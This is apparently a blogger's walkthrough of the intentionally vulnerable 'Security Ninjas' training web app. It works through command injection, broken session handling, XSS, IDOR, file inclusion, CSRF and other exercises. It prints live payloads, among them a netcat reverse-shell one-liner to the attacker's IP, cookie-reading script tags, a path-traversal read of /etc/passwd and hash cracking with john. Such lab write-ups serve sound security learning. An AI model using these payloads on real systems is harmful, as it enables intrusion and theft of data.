root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

This is a Vulnerable Machine Security Ninjas.

We can test this for common web vulnerabilities

image

Well, lets dig in

A1

image

We were told that this page has an OS Command Injection flaw

Lets provide a domain name say google.com

image image

So we got the whois look up results for the domain name google.com

The semicolon(;) is often used as a delimiter so seperate multiple commands within a single input field. So, we can try to use the semicolon(;) character to run multiple commands.

For example lets say we want to run the id command alongside the domain name we provided. So, we’ll be having an input like this google.com;id

Lets try to execute this to see what happens

image image

Scroll down,

image

It worked hehe, we were able to successfully execute the linux command

Other delimiter characters like | and || also works

image

Lets get a reverse shell from this

payload:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f

Ensure you set up a netcat listener

So, our input would look like this google.com|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.168 1234 >/tmp/f

image

Checking my netcat listener

image

I was able to get a reverse shell.

Well, that’s all for this challenge since we’ve successfully exploited the vulnerability there.

A2

image image

So the exercise here is to get user2 personal information by exploiting the Broken Authentication and Session Management vulnerability

Lets try to login with the details they provided to us

username:user1 password:145_Bluxome

image image

Cool, we are logged in

Lets try to view personal details, but this time we’ll capture the request to burpsuite and send it over to burp repeater

image

We were able to view the personal information of user1. Well, something eyes catching here is the sessionID.

I ran hash-identifier on that hash and found

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ hash-identifier     
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: b3daa77b4c04a9551b8781d03191fe098f325e67

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Cool, the hash is SHA-1. Lets crack it to see what it says

Save the hash in a file and use john

command:john hash --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=RAW-sha1

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ john hash  --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=RAW-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
user1            (?)     
1g 0:00:00:02 DONE (2023-09-29 16:37) 0.4878g/s 1446Kp/s 1446Kc/s 1446KC/s user1 01989..user074
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.

John cracked the hash to be user1.

So, we can say the sessionID is user1.

To read user2 personal information, what we can do is generate a sha1 hash for user2.

I used this website for that

image

Now. we’ll be replacing the previous sessionID value with a1881c06eec96db9901c7bbfe41c42a3f08e9cb4

image

cool cool, we are able to read the personal information for user2.

That will be all for this challenge since we have successfully exploited the vulnerability😎

A3

image

We have both Reflected XSS and Stored XSS here.

Lets start with Reflected XSS

Reflexted XSS

image

Well, my name is BlackAnon, lets try that

image image

Lets try a simple javascript payload <script>alert(1)</script>

image image

The payload got executed successfully. Lets try to steal some cookies <script>alert(document.cookie)</script>

image image

Nice nice, we have successfully exploited this vulnerability.

Moving on to Stored XSS

Stored XSS

image

Lets try to provide some inputs

image image

Now, stored xss occurs when an application allows users to store data that includes malicious scripts on the server, and then serves that data to other users who view the affected page. This allows the attacker to execute their malicious code in the context of other users’ browsers, potentially leading to various security risks.

This means our payload will be stored and executed when a user performs an action in the affected page.

Lets inject the Name parameter with a simple javascript payload <script>alert(1)</script>

image image

Account creation was successful. Our payload will get executed when a user tries to view all the users in the database by clicking View Users

image

You can see it worked.

Lets try to steal cookies this time with the payload <script>alert(document.cookie)</script>

image image image

Our payload got executed successfully.

We have successfully exploited both Reflected XSS and Stored XSS

A4

image

So the task is to exploit the IDOR vulnerability and find a confidential document on the server.

Lets try to view the non-confidential document

image

We get this. Well, the name of the pdf looks suspicious🤔

image

This looks like hex, well lets use cyberchef to decode

image

The hex was decoded to be the word non_confidential. So, the way the document is named was by encoding the non_confidential word to hex

This means to view the confidential document we have to encode the word confidential to hex

Using cyberchef to encode

image

Lets replace 6e6f6e5f636f6e666964656e7469616c.pdf with 636f6e666964656e7469616c.pdf

image

We were able to successfully view the confidential document. This means we have successfully completed this exercise😎

A5

image

The task here is to exploit the file inclusion vulnerability

What happens when we click on Meme1??

image

Take note of the url

How about when we click on Meme2??

image

Take a note of the url for this also.

Lets, capture this request on burpsuite and send it over to burp repeater

image

Now, lets test for file inclusion vulnerabilities

We’ll start with Local File Inclusion

Local File Inclusion

Local File Inclusion (LFI) is a type of security vulnerability that occurs when an attacker can manipulate input to a web application or system in such a way that it allows them to include and execute files on the local file system.

To test for this, we can use the payload ../../../../../../etc/passwd, so we’ll replace meme2.html in the url to this payload

image

Cool stuff hehe, we were able to exploit Local File Inclusion on this server.

Moving on to Remote File Inclusion

Remote File Inclusion

Remote File Inclusion (RFI) is a security vulnerability that occurs in web applications when an attacker is able to include files from a remote server into the web application’s code.

So, we’ll host a file on our machine and try to execute it from the web application.

Lets host a .txt file

┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ echo "vawulence is good for the health" > bankai.txt
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ ls -l bankai.txt 
-rw-r--r-- 1 bl4ck4non bl4ck4non 33 Sep 29 23:19 bankai.txt
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ python3 -m http.server 80                                      
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

nice nice, now lets try to execute this file from the webserver

image

Well, it didn’t work, our file didn’t get executed.

So, it is safe to say we can exploit the Local File Inclusion on this webserver but not Remote File Inclusion.

We’ve successfully completed this task

A6

image

The task here is to find the hidden discount code by exploiting the sensitive data exposure vulnerability

Checking the page source, I found this

image

That’s a conditional statement that gives 10% off if the discount code matches oneteamonedream.

We’ve completed the task😎. It was quite easy actually

A7

image

The task here is to find the function that lacks access control

image

Click on that, then capture the request using burpsuite and send it over to burp repeater

image

We can see the is_admin function has a value of false. What happens when we change that value to true??

Well, lets find out

A8

image image

We were provided login creds, the task is to login to the vulnerable page

Lets login as user1

image image

We are asked to view email, lets do just that

image

We are told that this page doesn’t have csrf protection, this means that it is vulnerable to CSRF attacks. CSRF is a type of security vulnerability where an attacker tricks a victim into making an unwanted or unauthorized request to a web application on which the victim is authenticated.

Lets try to update user1 email address

image image

We were able to successfully update user1 email address. Lets try updating the email for user2

image image

So, we don’t have the right privileges to perform this action

A9

image

The task here is to exploit the public known vulnerability in one of the components the page uses

Checking the page source,

image

Well, I think there’s a vulnerability for that component